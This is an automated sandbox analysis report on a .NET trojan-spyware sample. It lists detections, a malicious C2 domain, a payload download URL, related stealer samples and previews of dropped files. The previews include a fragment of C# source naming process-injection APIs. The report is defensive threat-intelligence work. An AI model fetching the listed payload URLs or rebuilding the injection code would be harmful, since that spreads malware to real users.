Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
EBUdultKh7.exe	64%	Virustotal		Browse
EBUdultKh7.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
EBUdultKh7.exe	100%	Avira	HEUR/AGEN.1306918
EBUdultKh7.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.dll	100%	Avira	HEUR/AGEN.1300034
C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.dll	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
stare-roar.cyou	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://stare-roar.cyou/api	100%	Avira URL Cloud	malware
https://stare-roar.cyou/_b_=	100%	Avira URL Cloud	malware
http://147.45.44.131/infopage/vsom.exe	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/vsom.exeP	0%	Avira URL Cloud	safe
https://stare-roar.cyou:443/api	100%	Avira URL Cloud	malware
stare-roar.cyou	100%	Avira URL Cloud	malware
https://stare-roar.cyou:443/apin.txtPK	100%	Avira URL Cloud	malware
http://147.45.44.131/infopage/vsom.exeP	12%	Virustotal		Browse
https://stare-roar.cyou/pi	100%	Avira URL Cloud	malware
https://stare-roar.cyou/	100%	Avira URL Cloud	malware
http://147.45.44.131/infopage/vsom.exe	15%	Virustotal		Browse
https://stare-roar.cyou:443/apil	100%	Avira URL Cloud	malware
https://stare-roar.cyou/1	100%	Avira URL Cloud	malware
https://stare-roar.cyou:443/api	0%	Virustotal		Browse
http://147.45.44.131	0%	Avira URL Cloud	safe
https://stare-roar.cyou//c	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
stare-roar.cyou	104.21.78.149	true	true	10%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://stare-roar.cyou/api	true	Avira URL Cloud: malware	unknown
dare-curbys.biz	false		high
impend-differ.biz	false		high
zinc-sneark.biz	false		high
covery-mover.biz	false		high
http://147.45.44.131/infopage/vsom.exe	false	15%, Virustotal, Browse Avira URL Cloud: safe	unknown
formy-spill.biz	false		high
stare-roar.cyou	true	Avira URL Cloud: malware	unknown
se-blurry.biz	false		high
print-vexer.biz	false		high
dwell-exclaim.biz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://stare-roar.cyou:443/api	RegAsm.exe, 00000005.00000002.1623376663.000000000126A000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://stare-roar.cyou/_b_=	RegAsm.exe, 00000005.00000002.1623376663.00000000012DC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://147.45.44.131/infopage/vsom.exeP	EBUdultKh7.exe, 00000000.00000002.1416375255.0000000003261000.00000004.00000800.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://stare-roar.cyou:443/apin.txtPK	RegAsm.exe, 00000005.00000002.1623376663.000000000126A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	EBUdultKh7.exe, 00000000.00000002.1416375255.00000000032CB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stare-roar.cyou/pi	RegAsm.exe, 00000005.00000002.1623376663.00000000012DC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://stare-roar.cyou/	RegAsm.exe, 00000005.00000002.1623376663.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1623376663.000000000127F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1623376663.000000000126A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://stare-roar.cyou:443/apil	RegAsm.exe, 00000005.00000002.1623376663.000000000126A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://stare-roar.cyou/1	RegAsm.exe, 00000005.00000002.1623376663.000000000126A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://147.45.44.131	EBUdultKh7.exe, 00000000.00000002.1416375255.00000000032CB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stare-roar.cyou//c	RegAsm.exe, 00000005.00000002.1623376663.00000000012DC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.45.44.131	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	false
104.21.78.149	stare-roar.cyou	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572963
Start date and time:	2024-12-11 10:44:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	EBUdultKh7.exe renamed because original name is a hash value
Original Sample Name:	7c8c89e28b6034fe5b87b59d127ba505.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/7@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 38 Number of non-executed functions: 94
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:45:00	API Interceptor	1x Sleep call for process: EBUdultKh7.exe modified
04:45:03	API Interceptor	7x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.45.44.131	MiJZ3z4t5K.exe	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/Tom.exe
	ZjH6H6xqo7.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tvh53.exe
	nlJ2sNaZVi.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbh75.exe
	TZ33WZy6QL.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbg9.exe
	7IXl1M9JGV.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbg9.exe
	7IXl1M9JGV.exe	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/bhdh552.ps1
	Rechnung_643839483.pdf.lnk	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/cdeea.exe
	file.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/gqgqg.exe
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	147.45.44.131/files/tpgl053.exe
	ptgl503.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/gpto03.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse	104.18.41.169
	https://renemattner.simvoly.com/?preview=__PREVIEW_ONLY&c=E,1,Ks6Sg62CfOE_CkRSGsjWzEZqQJ4kslHIx5N9ygK8IrTT7dwyHfXwvE4VbQEnQwQXPVvQMpZGcaIV_fVQbP7vMcdrXBRSSDaH5Z18aBsWUw,,&typo=1	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	Nieuwebestellingen10122024.exe	Get hash	malicious	FormBook	Browse	172.64.41.3
	https://smialex.id/Frbleuelsas	Get hash	malicious	Anonymous Proxy	Browse	104.21.37.221
	https://smialex.id/Frbleuelsas	Get hash	malicious	Anonymous Proxy	Browse	172.67.213.233
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	QUOTATION#08670.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	DEC 2024 RFQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	LXS5itpTK7.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
FREE-NET-ASFREEnetEU	arm5.elf	Get hash	malicious	Unknown	Browse	193.233.202.23
	Wh2c6sgwRo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	147.45.47.151
	installer.exe	Get hash	malicious	Unknown	Browse	193.233.254.0
	installer.exe	Get hash	malicious	Unknown	Browse	193.233.254.0
	MiJZ3z4t5K.exe	Get hash	malicious	Unknown	Browse	147.45.44.131
	tyhkamwdmrg.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81
	kyhjasehs.exe	Get hash	malicious	DCRat	Browse	147.45.47.156
	fkydjyhjadg.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81
	KBKHHYI29L.msi	Get hash	malicious	Amadey	Browse	147.45.47.167
	nklmpsl.elf	Get hash	malicious	Unknown	Browse	193.233.234.120

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe	Get hash	malicious	Poisonivy	Browse	104.21.78.149
	CMK7DB5YtR.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.78.149
	XrQ8NgQHTn.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.78.149
	Ziraat Bankasi Swift Mesaji.dqy.dll	Get hash	malicious	AsyncRAT, VenomRAT	Browse	104.21.78.149
	Price Quotation-01.dqy.dll	Get hash	malicious	Snake Keylogger	Browse	104.21.78.149
	Z9lFNBiLGK.exe	Get hash	malicious	DBatLoader	Browse	104.21.78.149
	Z9lFNBiLGK.exe	Get hash	malicious	DBatLoader	Browse	104.21.78.149
	https://ytfjghloadv1.b-cdn.net/proCESSINGveriffv001.html	Get hash	malicious	CAPTCHA Scam ClickFix, LummaC Stealer	Browse	104.21.78.149
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	104.21.78.149
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.78.149

Process:	C:\Users\user\Desktop\EBUdultKh7.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\RES6F80.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Wed Dec 11 10:51:56 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	3.979561446126854
Encrypted:	false
SSDEEP:	24:Hem9Iu/xaBEHvxwKTF9mfwI+ycuZhNSakSaPNnqSSd:QeIBEyKTfmo1ulSa3WqSC
MD5:	E04580C7DBE8148B6D6266C1DDE9598F
SHA1:	E6D83692A7015F9B2366DB63E603C372CEC59B40
SHA-256:	22FBE4D25E61A01C29E668F963907E9138D7F3D6C55D1194C9BDA6F26BBB5E00
SHA-512:	3688E6A5FE82000C6BDA91D7286A710113C56401CE3E5B80FBF073D40761EAC84B8B1F80957AFFF95B4BC606FF34E56990D5606A4AB4F1DC3946AE2F4ABA7781
Malicious:	false
Reputation:	low
Preview:	L....nYg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\ypmbwesq\CSC8091DC6DAAC840838D6B58938AE1A03F.TMP....................H}.n....1.5............5.......C:\Users\user\AppData\Local\Temp\RES6F80.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.p.m.b.w.e.s.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

C:\Users\user\AppData\Local\Temp\ypmbwesq\CSC8091DC6DAAC840838D6B58938AE1A03F.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1015997565707543
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0ak7YnqqaPN5Dlq5J:+RI+ycuZhNSakSaPNnqX
MD5:	86AF487D166E09BDEFA2DC31BD35BDC5
SHA1:	8A4FB36742628A8422391B4D1B80BEBD5259A494
SHA-256:	9336C36F151E940B59D2305E9E784C31297C240AA5244D18D193137F1B1C04C0
SHA-512:	E25E094E238BA0798C258260100CB4B5A6CD2F817A9DE5F4F4B2BA46F4A0C181B7AA42A51238C2F6D113584B55A975349DDC996915ADAAB44FFB3BC02443744C
Malicious:	false
Reputation:	low
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.p.m.b.w.e.s.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.p.m.b.w.e.s.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.0.cs

Download File

Process:	C:\Users\user\Desktop\EBUdultKh7.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	10583
Entropy (8bit):	4.487855797297623
Encrypted:	false
SSDEEP:	192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
MD5:	B022C6FE4494666C8337A975D175C726
SHA1:	8197D4A993E7547D19D7B067B4D28EBE48329793
SHA-256:	D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
SHA-512:	DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
Malicious:	true
Reputation:	low
Preview:	.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline

Download File

Process:	C:\Users\user\Desktop\EBUdultKh7.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	206
Entropy (8bit):	4.948106180179815
Encrypted:	false
SSDEEP:	6:pAu+H2L/6K2CHhJ23fYdzxszICHhJ23fY4:p37L/6KiwdZw4
MD5:	4A7E79C0EBCF1F94E8471E73FFB5B733
SHA1:	F45F767E3E03EA51A28DB862ECCD7C58012FAEA3
SHA-256:	41FEE1B93E004B18494346B959F8EB63071B1904B359B8B7E6A1CF8511D48D5C
SHA-512:	089DD8B29D44C1320A5432F82DE147590CA7D4732D1FEFC69BE0E39FAD049B1E0827B01A92CBD765A1CD9833A2AD440AE5FCBC7B146637D21B0800E1ACE0DF82
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.0.cs"

C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	4.660620918598037
Encrypted:	false
SSDEEP:	96:TbuaQZGQf9xPQ2pCa/u67hHJk9IhbpPrjzKcaEZRUH0ljILHqrv5MqTTzeNc+ikK:TCaQHf9WDa/u6lRj2cavUxd5MqLeNc5
MD5:	D6B616F2E82D06F87E37B8E2959D7A73
SHA1:	D97CE459CE0443E6EB8881C5B0A6FEBF0E9648F3
SHA-256:	9EE1D3CD2F6053DA2EAA3FA839A29C402F475C61012015C1B01B7C74867E7ED2
SHA-512:	500772B8415B5D17F6FE7DFD67D15672A23A93927892309748CBB7D3C2F5C6693B1C2DBF2C828FB7DE08B91A12C0DB22EB1188D1D2A10A56928F46AC6223E726
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nYg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(...."..(......(.......0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p.....(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......

C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.out

Download File

Process:	C:\Users\user\Desktop\EBUdultKh7.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	705
Entropy (8bit):	5.2336187870896635
Encrypted:	false
SSDEEP:	12:K8/qR37L/6KiwdZwtKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdn6KiwbwtKax5DqBVKVrdFAMBJTH
MD5:	5B8F0B66425F60C75A99C4D37B48C726
SHA1:	E7BBBEC00045248CA9F4572B4758ADD45EC3A49A
SHA-256:	6309528673E17B246C9815276AB2EEF2CD090A79001E6A439A6A29A72D3F937F
SHA-512:	8382792BDD744942C295B202C82B5D11127E858F93F50ED6A30F20920A583AEEE4133859DF13A732F13A126C98E0236DD3923B97ED1D380944F77929DF520AFD
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	3.920239721032673
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	EBUdultKh7.exe
File size:	44'544 bytes
MD5:	7c8c89e28b6034fe5b87b59d127ba505
SHA1:	114a06cebd0501b923e4b4074203312e24cab40f
SHA256:	c4d8d3cb7debaa8a0bc6ece6157ace94e11d3f03cdd0093d6daf6155bf5e927c
SHA512:	bccbc3e74f9ac846006ee1f876825645513cb41a712e4dca249d4a4bafedb52fa80a435aaa4a7bbdc3cb1f453e10d3d72a9b801e772701499287f0b0eaaeda44
SSDEEP:	768:3/EVNSVwafevGHkiV++I1gqDnJuuAuznQVLNvxu0BvkwIt6BcN4feC:3sVN7aeGEk+11Tu9AnQVLNppvk9RN4GC
TLSH:	D713585575FEA029D5BBEBB5BEDDACEDC89E5971182C245700C1928B4B20FE0EA43C34
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............B.... ........@.. ....................... ............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40c342
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xEC1D1ADB [Tue Jul 12 17:33:15 2095 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc2f0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x5b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc2d4	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
